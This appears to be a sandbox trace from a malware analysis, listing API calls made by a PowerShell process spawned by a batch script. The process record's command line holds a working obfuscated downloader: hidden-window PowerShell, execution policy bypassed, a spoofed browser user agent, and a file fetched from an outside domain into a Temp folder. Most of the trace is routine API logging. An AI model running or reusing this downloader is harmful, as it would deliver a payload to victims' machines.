	[0123.908] GetProcessHeap () returned 0x80000
	[0123.908] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x30) returned 0x969a0
	[0123.908] GetProcessHeap () returned 0x80000
	[0123.908] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x14) returned 0x98d80
	[0123.908] GetProcessHeap () returned 0x80000
	[0123.908] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xb0) returned 0x9a240
	[0123.909] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0123.909] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0123.909] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0123.909] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0123.909] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0123.909] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0123.909] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0123.909] GetProcessHeap () returned 0x80000
	[0123.909] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0xb0) returned 0x9a300
	[0123.909] GetProcessHeap () returned 0x80000
	[0123.909] RtlAllocateHeap (HeapHandle=0x80000, Flags=0x8, Size=0x2e) returned 0x969e0

Process:
	id = "44"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2383f000"
	os_pid = "0xce0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "43"
	os_parent_pid = "0xc6c"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 340
	os_tid = 0xce4

	[0124.866] IsFolderShortcut () 
	[0125.451] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0126.378] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0127.418] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0127.419] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0127.419] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0127.419] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0128.849] AtlComPtrAssign () 
	[0129.637] GetVersionExW (in: lpVersionInformation=0x17df40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17df40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0129.639] GetVersionExW (in: lpVersionInformation=0x17df40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17df40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0129.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0129.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x17dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0129.651] GetVersionExW (in: lpVersionInformation=0x17dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x17dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0129.652] SetErrorMode (uMode=0x1) returned 0x1
	[0129.653] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x17de10 | out: lpFileInformation=0x17de10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0129.890] SetErrorMode (uMode=0x1) returned 0x1
	[0129.893] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x17e080 | out: lpdwHandle=0x17e080) returned 0x94c
	[0129.895] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b37370 | out: lpData=0x2b37370) returned 1
	[0129.897] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x17dff8, puLen=0x17dff0 | out: lplpBuffer=0x17dff8*=0x2b3740c, puLen=0x17dff0) returned 1
	[0129.899] lstrlenW (lpString="䅁") returned 1
	[0129.907] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b374e8, puLen=0x17df60) returned 1
	[0129.908] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0129.910] CoTaskMemAlloc (cb=0x2e) returned 0x43d260
	[0129.910] lstrcpyW (in: lpString1=0x43d260, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0129.910] CoTaskMemFree (pv=0x43d260) 
	[0129.910] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b3753c, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="System.Management.Automation") returned 28
	[0129.911] CoTaskMemAlloc (cb=0x3c) returned 0x3e4230
	[0129.911] lstrcpyW (in: lpString1=0x3e4230, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0129.911] CoTaskMemFree (pv=0x3e4230) 
	[0129.911] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b37598, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0129.911] CoTaskMemAlloc (cb=0x20) returned 0x4453f0
	[0129.911] lstrcpyW (in: lpString1=0x4453f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0129.911] CoTaskMemFree (pv=0x4453f0) 
	[0129.911] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b375d8, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0129.911] CoTaskMemAlloc (cb=0x44) returned 0x3e4230
	[0129.911] lstrcpyW (in: lpString1=0x3e4230, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0129.911] CoTaskMemFree (pv=0x3e4230) 
	[0129.911] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b37640, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0129.911] CoTaskMemAlloc (cb=0x76) returned 0x3d3350
	[0129.911] lstrcpyW (in: lpString1=0x3d3350, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0129.911] CoTaskMemFree (pv=0x3d3350) 
	[0129.911] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b376dc, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0129.911] CoTaskMemAlloc (cb=0x44) returned 0x3e4230
	[0129.911] lstrcpyW (in: lpString1=0x3e4230, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0129.911] CoTaskMemFree (pv=0x3e4230) 
	[0129.911] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b37740, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0129.911] CoTaskMemAlloc (cb=0x58) returned 0x3fa6d0
	[0129.911] lstrcpyW (in: lpString1=0x3fa6d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0129.911] CoTaskMemFree (pv=0x3fa6d0) 
	[0129.911] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b377bc, puLen=0x17df60) returned 1
	[0129.911] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0129.911] CoTaskMemAlloc (cb=0x20) returned 0x4453f0
	[0129.911] lstrcpyW (in: lpString1=0x4453f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0129.911] CoTaskMemFree (pv=0x4453f0) 
	[0129.912] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x2b37464, puLen=0x17df60) returned 1
	[0129.912] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0129.912] CoTaskMemAlloc (cb=0x66) returned 0x4439f0
	[0129.912] lstrcpyW (in: lpString1=0x4439f0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0129.912] CoTaskMemFree (pv=0x4439f0) 
	[0129.912] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x0, puLen=0x17df60) returned 0
	[0129.912] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x0, puLen=0x17df60) returned 0
	[0129.912] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x17df68, puLen=0x17df60 | out: lplpBuffer=0x17df68*=0x0, puLen=0x17df60) returned 0
	[0129.912] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x17df38, puLen=0x17df30 | out: lplpBuffer=0x17df38*=0x2b3740c, puLen=0x17df30) returned 1
	[0129.913] CoTaskMemAlloc (cb=0x204) returned 0x3e8360
	[0129.913] VerLanguageNameW (in: wLang=0x0, szLang=0x3e8360, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0129.914] CoTaskMemFree (pv=0x3e8360) 
	[0129.914] VerQueryValueW (in: pBlock=0x2b37370, lpSubBlock="\\", lplpBuffer=0x17df88, puLen=0x17df80 | out: lplpBuffer=0x17df88*=0x2b37398, puLen=0x17df80) returned 1
	[0129.919] GetCurrentProcessId () returned 0xce0
	[0129.924] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x17ceb0 | out: lpLuid=0x17ceb0*(LowPart=0x14, HighPart=0)) returned 1
	[0130.171] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x17ced0 | out: TokenHandle=0x17ced0*=0x2ec) returned 1
	[0130.172] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2b3abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0130.183] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2b3ac50, cb=0x200, lpcbNeeded=0x17dee8 | out: lphModule=0x2b3ac50, lpcbNeeded=0x17dee8) returned 1
	[0130.185] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2b3aec0, cb=0x18 | out: lpmodinfo=0x2b3aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0130.186] CoTaskMemAlloc (cb=0x804) returned 0x447970
	[0130.186] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x447970, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0130.187] CoTaskMemFree (pv=0x447970) 
	[0130.187] CoTaskMemAlloc (cb=0x804) returned 0x447970
	[0130.187] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x447970, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0130.188] CoTaskMemFree (pv=0x447970) 
	[0130.188] CloseHandle (hObject=0x2ec) returned 1
	[0130.196] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xce0) returned 0x2ec
	[0130.197] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x17e018 | out: lpExitCode=0x17e018*=0x103) returned 1
	[0130.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b3b088, Length=0x20000, ResultLength=0x17dfe0 | out: SystemInformation=0x12b3b088, ResultLength=0x17dfe0*=0x13728) returned 0x0
	[0130.214] EnumWindows (lpEnumFunc=0x1f866ac, lParam=0x0) returned 1
	[0130.214] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.449] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.449] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.449] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x334
	[0130.449] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x324
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.450] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x30290, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc70
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7dc
	[0130.451] GetWindowThreadProcessId (in: hWnd=0xb0184, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc08
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x40240, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x728
	[0130.451] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x9ec
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x610
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xb5c
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xbdc
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x8f0
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xb8c
	[0130.451] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5e0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x90
	[0130.452] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x4a0
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x840
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x844
	[0130.452] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x46c
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xb40
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x988
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x950
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x914
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x868
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x850
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x830
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x814
	[0130.453] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x744
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x2a8
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x534
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5e4
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5c4
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x58c
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x238
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x584
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7e8
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x678
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x35c
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x51c
	[0130.454] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x360
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x274
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x588
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0xc8
	[0130.455] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x21c
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5ec
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x334
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x664
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x334
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x664
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x334
	[0130.455] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5ec
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x5ec
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x550
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x7a0
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x594
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x564
	[0130.456] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x17dd40 | out: lpdwProcessId=0x17dd40) returned 0x45c
